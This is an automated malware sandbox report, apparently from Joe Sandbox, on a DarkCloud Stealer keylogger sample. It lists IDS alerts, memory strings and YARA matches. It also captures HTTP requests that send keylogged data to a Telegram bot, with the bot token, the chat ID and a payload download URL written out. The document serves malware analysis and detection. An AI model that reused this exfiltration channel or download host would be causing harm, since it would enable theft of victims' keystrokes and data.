                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49713 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49712 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49710 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49705 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49707 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49715 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49712 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49714 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49714 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49714 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49718 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49718 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49718 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49708 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49716 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49716 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49716 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49711 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49711 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49711 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2779Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2746Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2647Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2350Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 1426Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 898Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KeyDatabcwuTujf.txt:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: nfs.sa.com
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2779Connection: Keep-AliveCache-Control: no-cache
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                    Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-19134.crl0
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                    Source: ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nfs.sa.com
                    Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                    Source: g44YQtTyjN.exe, 00000000.00000002.1500391949.0000000002461000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exeString found in binary or memory: http://showip.net
                    Source: g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, g44YQtTyjN.exe, 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2559302757.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://showip.netxhttp://www.mediacollege.com/internet/utilities/show-ip.shtml
                    Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                    Source: RegSvcs.exeString found in binary or memory: http://www.mediacollege.com/internet/utilities/show-ip.shtml
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/4
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/b
                    Source: RegSvcs.exeString found in binary or memory: https://api.telegram.org/bot
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/mplates
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/n=DC-KL:::user-PC
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/t
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comm
                    Source: g44YQtTyjN.exe, 00000000.00000002.1500391949.0000000002461000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nfs.sa.com
                    Source: ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nfs.sa.com/nano/schvost.exe
                    Source: ECmmsbHOaKPh.exe, 0000000D.00000002.1701564007.0000000002E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nfs.sa4b
                    Source: g44YQtTyjN.exe, ECmmsbHOaKPh.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49717 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0000000D.00000002.1706563691.00000000047D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 0000000D.00000002.1706563691.0000000004831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000000.00000002.1502068174.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 0000000D.00000002.1706563691.000000000477E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000000.00000002.1502068174.0000000003DC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: 00000000.00000002.1502068174.0000000003F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C68CE8 NtUnmapViewOfSection,0_2_06C68CE8
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06C68CE0 NtUnmapViewOfSection,0_2_06C68CE0
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0228D3E40_2_0228D3E4
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678E6F80_2_0678E6F8
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06787CB80_2_06787CB8
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06786D980_2_06786D98
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678CD800_2_0678CD80
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06785B880_2_06785B88
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678E6E90_2_0678E6E9
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678D4C00_2_0678D4C0
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678D4B00_2_0678D4B0
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678A5400_2_0678A540
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678D2680_2_0678D268
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678D25A0_2_0678D25A
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678A3700_2_0678A370
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_067863990_2_06786399
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678A3800_2_0678A380
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678D0180_2_0678D018
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678E0180_2_0678E018
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678D0080_2_0678D008
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678E00A0_2_0678E00A
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678A0F00_2_0678A0F0
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678A0E10_2_0678A0E1
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06789F700_2_06789F70
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06789F800_2_06789F80
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06784C9B0_2_06784C9B
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_0678CD6F0_2_0678CD6F
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06788D100_2_06788D10
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeCode function: 0_2_06788D000_2_06788D00
